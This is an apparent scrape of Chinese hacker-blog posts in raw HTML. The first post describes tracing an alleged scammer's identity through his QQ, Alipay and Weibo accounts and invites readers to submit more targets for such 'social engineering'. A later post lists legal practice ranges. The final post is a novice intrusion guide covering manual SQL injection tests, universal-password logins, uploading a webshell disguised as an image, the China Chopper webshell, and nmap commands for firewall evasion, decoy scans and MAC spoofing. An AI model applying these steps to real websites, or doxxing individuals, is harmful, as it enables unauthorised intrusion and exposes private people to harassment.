src=&/50/v2-cffaca59b2992972afb8fc_b.jpg& data-rawwidth=&588& data-rawheight=&347& class=&origin_image zh-lightbox-thumb& width=&588& data-original=&/50/v2-cffaca59b2992972afb8fc_r.jpg&&&img src=&/50/v2-4e9de4354d_b.jpg& data-rawwidth=&800& data-rawheight=&394& class=&origin_image zh-lightbox-thumb& width=&800& data-original=&/50/v2-4e9de4354d_r.jpg&&&p&&b&厉害啊
只要给钱没有调查不到的事
估计FBI都不敢这么说吧&/b&&/p&&p&&b&既然你这么屌
那就社你了 &/b&&/p&&br&&p&&b&15*******960
已知 一个QQ号
用来行骗的 qq绑定了支付宝&/b&&/p&&p&&b&百度了一下&/b&&/p&&img src=&/50/v2-d7d540c729af7ef47ab94b3cb7f4bfa8_b.jpg& data-rawwidth=&299& data-rawheight=&207& class=&content_image& width=&299&&&p&&b&新疆的
有百度账号了 准备去查一下支付宝然后猜一猜真实姓名&/b&&/p&&p&&b&输入之后发现已经设置了不能通过邮箱找到他 &/b&&/p&&p&&b&那先加他qq聊聊吧
加他&/b&&/p&&p&&img src=&/50/v2-6adaffee5a393_b.jpg& data-rawwidth=&550& data-rawheight=&356& class=&origin_image zh-lightbox-thumb& width=&550& data-original=&/50/v2-6adaffee5a393_r.jpg&&&b&不对劲啊 加他三次都没同意
加了第四次之后他也没回复 每次加他填写内容是帮忙查人
不应该不加我
既然不加我 就继续
找找别的信息 正打算试试支付宝找回密码功能看看其他信息的时候他同意我了&/b&&br&&/p&&img src=&/50/v2-6dc751dea5e5fd0d0026ec_b.jpg& data-rawwidth=&581& data-rawheight=&542& class=&origin_image zh-lightbox-thumb& width=&581& data-original=&/50/v2-6dc751dea5e5fd0d0026ec_r.jpg&&&br&&p&&b&原来我直播社工他的时候群里出了奸细
跑去跟人家说我在社工他 他也进群看直播来了 一直在暗中观察啊
我说怎么就不加我 &/b&&br&&/p&&img src=&/50/v2-d363f7be85b7e5fa9eca0e_b.jpg& data-rawwidth=&244& data-rawheight=&220& class=&content_image& width=&244&&&p&&b&然而说完那些话我知道他在暗中观察的时候我也没打算关直播
&/b&&/p&&p&&b&经过细心搜索发现他腾讯微博&/b&&/p&&img src=&/50/v2-a81a7abf3d83a_b.jpg& data-rawwidth=&483& data-rawheight=&291& class=&origin_image zh-lightbox-thumb& width=&483& data-original=&/50/v2-a81a7abf3d83a_r.jpg&&&p&&b&就在这个时候骗子给我发了语音过来 我接了
给我说了一堆什么前面是没时间&/b&&/p&&p&&b&上面查东西的人没联系到什么的说了一堆
当时我没麦 然后就打字的 &img src=&/50/v2-b2dbc0dde8b8abd53ba35e156a7dede4_b.jpg& data-rawwidth=&332& data-rawheight=&267& class=&content_image& width=&332&&&/b&&/p&&p&&b&他也承认了前前后后骗了人家妹子500块钱钱&/b&&/p&&br&&p&&b&然后我让他把钱钱退还给妹子我可以原谅他 &/b&&/p&&p&&img src=&/50/v2-039663afacafa9_b.jpg& data-rawwidth=&534& data-rawheight=&245& class=&origin_image zh-lightbox-thumb& width=&534& data-original=&/50/v2-039663afacafa9_r.jpg&&&b&他也表示要退 看他迟迟没有行动我就继续开始社工了 &/b&&br&&/p&&img src=&/50/v2-944c2f73a7c3d0d65fe6f36e68ed2547_b.jpg& data-rawwidth=&490& data-rawheight=&407& class=&origin_image zh-lightbox-thumb& width=&490& data-original=&/50/v2-944c2f73a7c3d0d65fe6f36e68ed2547_r.jpg&&&p&&b&昊 名字两个字 而微博账户有是ZH
可以推断是他名字首字母&/b&&/p&&p&&b&就在这时候骗子有给我回话了&/b&&/p&&p&&img src=&/50/v2-264aa56a027b995d0f9c4c6be2d8e146_b.jpg& data-rawwidth=&554& data-rawheight=&331& class=&origin_image zh-lightbox-thumb& width=&554& data-original=&/50/v2-264aa56a027b995d0f9c4c6be2d8e146_r.jpg&&&img src=&/50/v2-f6fd5ea6d43c818a05ba_b.jpg& data-rawwidth=&415& data-rawheight=&743& class=&content_image& width=&415&&&b&说完他立马去吧钱钱给退回去了&/b&&br&&/p&&img src=&/50/v2-26d87fafdaf066d602a96_b.jpg& data-rawwidth=&328& data-rawheight=&678& class=&content_image& width=&328&&&p&&b&跟粉丝确认退钱了&/b&&/p&&p&&b&然后就装了一B&/b&&/p&&img src=&/50/v2-5b031effe942f0dfbba045b_b.jpg& data-rawwidth=&407& data-rawheight=&344& class=&content_image& width=&407&&&p&&b&本来打算把他交给新疆网监的无奈没有认识的新疆警察叔叔
而且500块钱钱也不能立案
再说他还是个孩子 目测就是个17-22岁的孩子 &/b&&/p&&p&&b&所以就先放过他一马了 &/b&&/p&&br&&p&&b&PS:大家有被骗得可以去百度贴吧网络小捕快吧发帖举报 我会随机挑选 然后进行社工
发帖规则看上篇文章 或者看贴吧的线索举报格式&/b&&/p&&br&&p&&b&在PS:这次为什么打码
应为骗子承认错误了 而且钱钱也归还了 说以就不打算曝光了 &/b&&/p&&br&&p&&b&再再再pS:他给我发的语音我我找出来是arm格式 多次转换都是没法正常播放&/b&&/p&&p&&b&说以我就直接录音发上来给大家听听&/b&&/p&&br&&p&0:17&b&骗子的语言&/b&来自网络小捕快&/p&&p&&b&别忘了听一听骗子的语言&/b&&br&&/p&&p&&b&语言请到公众号听
微博发不上来&/b&&/p&&br&&p&&b&网络小捕快官方交流群 &/b&&/p&&p&&b&如果被骗了可以去百度贴吧 网络小捕快吧举报 &/b&&/p&
存好心,说好话,行好事,结好缘,做好人,人有善念,天必佑之 网络小捕快0X01粉丝的闺蜜怀疑男朋友出轨了 出轨了 出轨了 重要的事情说三遍 0X02 然后粉丝的闺蜜找了个能查出生到死亡的所有信息的黑客 黑客 黑客 帮忙查男朋友有没有出轨
0X03 结果很显然就…
&img src=&/50/v2-2e060ee4bbaa248cb6dd59_b.jpg& data-rawwidth=&1920& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&/50/v2-2e060ee4bbaa248cb6dd59_r.jpg&&&b&如果你被骗了&/b&&p&&b&可以联系我们 &/b&&/p&&p&&b&去我们的百度贴吧去举报&/b&&/p&&p&&b&贴吧地址 网络小捕快吧&/b&&/p&&p&&b&&a href=&/?target=http%3A///f%3Fkw%3D%25E7%25BD%%25BB%259C%25E5%25B0%258F%25E6%258D%%25BF%25AB%26fr%3Dhome& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&网络小捕快吧_百度贴吧&i class=&icon-external&&&/i&&/a&&br&&/b&&/p&&p&&b&举报格式都在贴吧写出来了 &/b&&/p&&p&&b&1:骗子你是从哪里认识的,怎么认识的 !&br&2:被骗记录 聊天记录 转账记录&br&3:对方qq或者交易账号&br&4;能补充说明就补充什么吧&br&&/b&&/p&&br&&p&&b&不按照格式直接发人家qq号说你被骗了那就只能把你拉黑了 到时候想举报都举报不了 &br&你不能以上来就说它是骗子 你得证明他是骗子 骗了你&br&怎么骗你的都要说清楚&br&&/b&&/p&&p&&b&你举报之后我们会随机挑选 然后进行社工&/b&&/p&&p&&b&必要的时候我们会帮你联系警察叔叔&/b&&/p&&p&&b&不管怎么样前提是你得先把受骗证据都保存好&/b&&/p&&p&&b&没有证据就不能举报 &/b&&/p&&p&&b&别的东西后面在补充吧
暂时还没想到啥东西&/b&&/p&&br&&br&&p&&b&只有一次举报机会
如果你乱写我们会将你永久拉黑&/b&&/p&&br&&p&&b&然后大家可以来关注一波我的微信公众号&/b&&/p&&p&&b&
喜欢社工 喜欢渗透的朋友可以加群 吃瓜群众也可以 &/b&&/p&&p&&b&网络小捕快官方交流群 &/b&&/p&
如果你被骗了可以联系我们 去我们的百度贴吧去举报贴吧地址 网络小捕快吧 举报格式都在贴吧写出来了 1:骗子你是从哪里认识的,怎么认识的 ! 2:被骗记录 聊天记录 转账记录 3:对方qq或者交易账号 4;能补充说明就补充什么吧
&img src=&/50/v2-1e28939daad8d573392cf_b.png& data-rawwidth=&628& data-rawheight=&324& class=&origin_image zh-lightbox-thumb& width=&628& data-original=&/50/v2-1e28939daad8d573392cf_r.png&&&p&直接推荐,因为有比较多,我也没办法把所有的都分享出来,大家可以在评论,私信,完善起来,分享才能进步。进攻即是最好的防御,这句话同样适用于信息安全的世界。合法的来练习黑客技术的网站,不管你是一名开发人员、安全工程师、代码审计师、渗透 测试人员,通过不断的练习才能让你成为一个优秀安全研究人员。希望对大家有帮助。收藏吧。点赞分享!&/p&&p&装装逼结束了 还是得学点东西。。发了几遍没有发出来。。。&/p&&p&去掉部分带攻击性的网站了 都是一些练手的了&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界10 仿黑客网站 装逼网站&i class=&icon-external&&&/i&&/a&&br&&/p&&p&&a href=&/heike& class=&internal&&花无涯带你走进黑客世界 ——知乎专栏&/a&&br&&/p&&p&&a href=&/?target=https%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&学习黑客的第一本书 网络黑白&i class=&icon-external&&&/i&&/a&&br&&/p&&h2&bWAPP&/h2&&p&免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。&/p&&p&bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。&/p&&p&下载地址: &br&&/p&&p&&a href=&/?target=http%3A//sourceforge.net/projects/bwapp/files/bee-box/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&sourceforge.net/project&/span&&span class=&invisible&&s/bwapp/files/bee-box/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&下载后解压用vmware打开,访问80端口,bwapp默认账号密码&/p&&p&具体的演示和操作方式就不具体的说了哈,有工具了 自己总要学会使用!&/p&&h2&Game of Hacks&/h2&&p&&a href=&/?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Game of Hacks&i class=&icon-external&&&/i&&/a&&/p&&p&基于游戏的方式来测试你的安全技术,每个任务题目提供了大量的代码,其中可能有也可能没有安全漏洞!&/p&&h2&GoogleGruyere&/h2&&p&一个看起来很low的网址,但充满了漏洞,目的是为了帮助那些刚开始学习应用程序安全性的人员。&/p&&p&官方地址: &a href=&/?target=http%3A//google-/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://google-&i class=&icon-external&&&/i&&/a&&/p&&p&可以直接在线答题 也可以下载代码在本地搭建&/p&&p&代码地址: &a href=&/?target=http%3A///code/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/c&/span&&span class=&invisible&&ode/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&本地搭建时注意只能用 python2.5 其他高版本的不行&/p&&p&官方指导教程:&/p&&p&&a href=&/?target=http%3A//google-/part1& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google-&/span&&span class=&invisible&&/part1&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A//google-/part2& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google-&/span&&span class=&invisible&&/part2&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A//google-/part3& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google-&/span&&span class=&invisible&&/part3&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A//google-/part4& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google-&/span&&span class=&invisible&&/part4&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A//google-/part5& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google-&/span&&span class=&invisible&&/part5&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&p&&strong&HackThis!!&/strong&&/p&&p&旨在教你如何破解、转储和涂改,以及保护网站的黑客技巧,提供超过50种不同的难度水平。&/p&&p&&a href=&/?target=https%3A//www.hackthis.co.uk/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&HackThis!! - The Hackers Playground&i class=&icon-external&&&/i&&/a&&/p&&p&&strong&Hack This Site&/strong&&/p&&p&是一个合法和安全的测试黑客技能的网站,并包含黑客资讯、文章、论坛和教程,旨在帮助你学习黑客技术。&/p&&p&&a href=&/?target=http%3A//www.hackthissite.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Hack This Site&i class=&icon-external&&&/i&&/a&&br&&/p&&p&(推荐使用Firefox浏览器)&/p&&p&第一关很简单,直接察看源代码,就可以看到密码直接写在注释里&/p&&p&第二关, 直接按submit就可以过关了&/p&&p&第三关, 密码的文件名写在代码里了&/p&&p&后面的就自己过了,都是非常简单 又基础的 没有那么枯燥&/p&&p&&strong&Mutillidae&/strong&&/p&&p&mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等,渗透测试演练系统,前面的多个章节也有发布过,这里就顺便在添加一些常用的,大家没事的就多翻一下专栏,有些文章底部有工具的提供。&/p&&p&DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。&/p&&p&链接地址:&a href=&/?target=http%3A//www.dvwa.co.uk/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Damn Vulnerable Web Application&i class=&icon-external&&&/i&&/a&&/p&&p&mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Irongeek” Crenshaw和Jeremy “webpwnized” Druin.开发的一款自由和开放源码的Web应用程序。其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等.&/p&&p&链接地址:&a href=&/?target=http%3A//sourceforge.net/projects/mutillidae& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&http://sourceforge.net/projects/mutillidae &i class=&icon-external&&&/i&&/a&&br&&/p&&p&SQLolSQLol是一个可配置得SQL注入测试平台,它包含了一系列的挑战任务,让你在挑战中测试和学习SQL注入语句。此程序在Austin黑客会议上由Spider Labs发布。&br&&/p&&p&链接地址:&a href=&/?target=https%3A///SpiderLabs/SQLol& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SpiderLabs/SQLol&i class=&icon-external&&&/i&&/a&&br&&/p&&p&更多的工具的平台 发在微博,知乎检测了,&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Sina Visitor System&i class=&icon-external&&&/i&&/a&&br&&/p&&br&&p&&strong&OverTheWire&/strong&基于游戏的让你学习安全技术和概念的黑客网站&/p&&p&Peruggia,一个提供安全、合法攻击的黑客网站&/p&&p&&strong&Root Me &/strong&通过超过200名黑客的挑战和50个虚拟环境来提高你黑客技巧和网络安全知识的网站&/p&&p&&strong&Try2Hack &/strong&最古老的黑客网站之一,提供多种安全挑战。&/p&&p&&strong&Vicnum &/strong&基于游戏的方式来引导安全开发者学习安全技术。&/p&&p&WebGoat 提供了一个真实的安全教学环境,指导用户设计复杂的应用程序安全问题&/p&&p&装逼的那些并不能在妹子面前耍帅 (那些工具只能纯属娱乐) 。只有通过真本事赢得妹子、赢得钱钱 (职场) 、赢得未来、真本事哪里来?&/p&&p&学习黑客的第一本书 工具书 系列入门学习 《&a href=&/?target=https%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&网络黑白&i class=&icon-external&&&/i&&/a&》&br&&/p&&p&每个章节都会有知识点,提到了几个关键字,渗透、入侵、社会工程学、蜜罐、内网渗透、外网渗透,白帽子,黑帽子等等。入侵渗透涉及许多知识和技术,需要前期的很多准备,请一定看完文字部分往下翻,网络安全极其重要,尤其是近两年,在早些时候,网络的防御几乎如纸窗一般,那时候大批的脚本小子也趁虚而入,许多数据都被盗取,而这时白帽子一词便也问世。同理的利用同样技术的另一对面的便是黑帽,在我看来并没有所谓的好坏一分,如果黑客与骇客一般,只看你自己如何理解,也不要给自己贴上所谓的标签。&br&&/p&&p&看到部分文章没有阅读到的可以翻一下我的微博文章、知乎专栏、微信公众号、黑客花无涯,都可以的,想进一步了解学习可以看看我的书 ,很多人有私信一直来问,这里就贴出来前几章的链接,方便查阅。感谢大家提出的建议,我的网盘也有小白&a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&入门教程&i class=&icon-external&&&/i&&/a&,零基础网盘 &a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度网盘-19****394的分享&i class=&icon-external&&&/i&&/a&。&/p&&p&自己的价值观是怎么样的,拿技术去做一些什么样的事情,成为什么样的人,愿望和初心是好的,做点有意义的事情,利用工具和平台是很方便,但是要养成思维和各种熟练的操作,而不是对什么都不懂,就靠着工具里头的功能。&/p&&p&“这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”每章结尾有彩蛋,it从业者和小白如何保护自己的招数。好了,话不多说,新手渗透必须学的就是先会安装这个平台,很多人虚拟机都还不会安装,先把虚拟机安装好,该学的自己都要去实践,去操作。&/p&&p&现实世界的每一个个人和组织,都在网络世界的版图中对应着属于自己的一座或大或小的城池。而在险恶的互联网丛林中,每座城市都随时面临来自黑暗中的突施冷箭,来跟我一起走进黑客世界。 &br&&/p&&p&网络世界比真实世界更浩淼,更繁复。正义的光芒难以照射这个空间的一切折痕沟回。更多的时候,这像一个黑暗的森林,我们需要用武器来武装自己,对抗黑暗中侵袭而来的枪弹。网络世界如何保护自己和身边的人? 跟我一起走进黑客世界 。&/p&&p&诚然,很多人想到黑客,就会联想到高超的技术。但是,当你真正了解到赛博世界殊死搏斗的真相,你就会理解,对于黑客的最高褒赏,并不是攻城略地的高超技术,而是不战而屈人之兵的闪光智慧。&/p&&p&我发现,无论任何人,只要找到好方向,找到对的人,做一个精心的布局,遇到一个不错的机会,玩命干起来,那么只要三年,或许只要两年,就足以改变一个人的大命运。比如从草根到行业大牛,从小创业者,到行业里的教父级人物。不存在什么十年打拼之类的, 黑客亦是如此,共勉。&/p&&p&中国黑客协会信息安全组织启用“H.A.C”,为组织全体成员代号。中国黑客协会是一种精神的传承,黑客代表是一种精神,它是一种热爱祖国、坚持正义、开拓进取的精神,不断的吸收与发展,中国黑客协会目前是世界范围内延续发展最久远的黑客组织之一。&br&&/p&&p&我们认为真正的民族主义者以追求本民族――中华民族的利益最大化为目标、准则、信念。判断一个人是不是真正的民族主义者,判断标准很简单:看他是给本民族的整体利益带来好处,还是损害民族利益。真正的民族主义者最务实,因为他知道坚持原则,同时又懂得策略。&/p&&p&感谢大家打赏给我动力更新下去!!!大家可以多给些建议和想法!&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客之 小白入门 第一弹&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界 2 学习渗透技术&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界3 白帽和黑帽&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界4 脚本小子&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界5 黑客历程&i class=&icon-external&&&/i&&/a& | &a href=&/heike& class=&internal&&黑客花无涯知乎专栏&/a&&br&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界6 漏洞扫描 &i class=&icon-external&&&/i&&/a&|&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界7 Dos命令&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界9 远控肉鸡&i class=&icon-external&&&/i&&/a&|&a href=&/p/& class=&internal&&花无涯带你走进黑客世界9远控肉鸡(番外篇)&/a&&/p&&p&&a href=&/p/& class=&internal&&2017黑客新手工具系列集合附链接&/a&&/p&
直接推荐,因为有比较多,我也没办法把所有的都分享出来,大家可以在评论,私信,完善起来,分享才能进步。进攻即是最好的防御,这句话同样适用于信息安全的世界。合法的来练习黑客技术的网站,不管你是一名开发人员、安全工程师、代码审计师、渗透 测试人…
&img src=&/50/v2-d4b7c6f612c91cc439a6d_b.jpg& data-rawwidth=&1080& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&/50/v2-d4b7c6f612c91cc439a6d_r.jpg&&零基础网盘 &a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度网盘-19****394的分享&i class=&icon-external&&&/i&&/a&&br&&p&新手入门过程 看完 后面有进阶过程&/p&&p&简单工具&/p&&p&注:工具网盘黑协纪念优盘有&/p&&p&1. 啊 D &/p&&p&2. 明小子&/p&&p&webshell&/p&&p&工具推荐: 中国菜刀&/p&&p&拿shell常用格式.asp.asa.csx.cer&/p&&p&手工判断是否可注入&/p&&p&url后添加 (1)and 1=1 (2)and 1=2&/p&&p&工具推荐:vstart&/p&&p&万能密码进站(老站)&/p&&p&常用万能密码&/p&&p&旁注(从旁注入)&/p&&p&百度 “同ip网站查询”&/p&&p&图片上传拿shell&/p&&p&在文件上传点,假装上传图片,实际上传大马,访问即可&/p&&p&手工爆账号密码&/p&&p&ip随意换&/p&&p&推荐工具:花刺代理&/p&&br&&p&每个章节都会有知识点,提到了几个关键字,渗透、入侵、社会工程学、蜜罐、内网渗透、外网渗透,白帽子,黑帽子等等。入侵渗透涉及许多知识和技术,需要前期的很多准备,请一定看完文字部分往下翻,网络安全极其重要,尤其是近两年,在早些时候,网络的防御几乎如纸窗一般,那时候大批的脚本小子也趁虚而入,许多数据都被盗取,而这时白帽子一词便也问世。同理的利用同样技术的另一对面的便是黑帽,在我看来并没有所谓的好坏一分,如果黑客与骇客一般,只看你自己如何理解,也不要给自己贴上所谓的标签。&br&&/p&&br&&p&看到部分文章没有阅读到的可以翻一下我的微博文章、知乎专栏、微信公众号、黑客花无涯,都可以的,想进一步了解学习可以看看我的第一本书 网络黑白 ,很多人有私信一直来问,这里就贴出来前几章的链接,方便查阅。感谢大家提出的建议。&/p&&br&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客之 小白入门 第一弹&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界 2 学习渗透技术&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界3 白帽和黑帽&i class=&icon-external&&&/i&&/a&|
&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界4 脚本小子&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界5 黑客历程&i class=&icon-external&&&/i&&/a& | &a href=&/heike& class=&internal&&黑客花无涯知乎专栏&/a&&br&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界6 漏洞扫描 &i class=&icon-external&&&/i&&/a&&br&&/p&&p&讲了脚本小子,虽然这些对于真正的黑客来说是必须具备的素质。但是需要看自己怎么理解,自己的价值观是怎么样的,拿技术去做一些什么样的事情,成为什么样的人,愿望和初心是好的,做点有意义的事情,利用工具和平台是很方便,但是要养成思维和各种熟练的操作,而不是对什么都不懂,就靠着工具里头的功能。&/p&&br&&p&“这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”每章结尾有彩蛋,it从业者和小白如何保护自己的招数。好了,话不多说,新手渗透必须学的就是先会安装这个平台,很多人虚拟机都还不会安装,先把虚拟机安装好,然后在安装这个。&/p&&br&&h3&最好的 NMAP 扫描策略&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 适用所有大小网络最好的 nmap 扫描策略
# 主机发现,生成存活主机列表
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep &Status: Up& Discovery.gnmap | cut -f 2 -d ' ' & LiveHosts.txt
# 端口发现,发现大部分常用端口
# http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
# 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
# 显示 TCP\UDP 端口
$ grep &open& FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print &T:&$0}'
$ grep &open& FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print &U:&$0}'
# 侦测服务版本
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
# 扫做系统扫描
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# 系统和服务检测
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
&/code&&/pre&&/div&&h3&Nmap – 躲避防火墙&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 分段
# 修改默认 MTU 大小,但必须为 8 的倍数(8,16,24,32 等等)
$ nmap --mtu 24
# 生成随机数量的欺骗
$ nmap -D RND:10 [target]
# 手动指定欺骗使用的 IP
$ nmap -D decoy1,decoy2,decoy3 etc.
# 僵尸网络扫描, 首先需要找到僵尸网络的IP
$ nmap -sI [Zombie IP] [Target IP]
# 指定源端口号
$ nmap --source-port 80 IP
# 在每个扫描数据包后追加随机数量的数据
$ nmap --data-length 25 IP
# MAC 地址欺骗,可以生成不同主机的 MAC 地址
$ nmap --spoof-mac Dell/Apple/3Com IP
&/code&&/pre&&/div&&h3&Nmap 进行 Web 漏洞扫描&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&cd /usr/share/nmap/scripts/
wget putec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
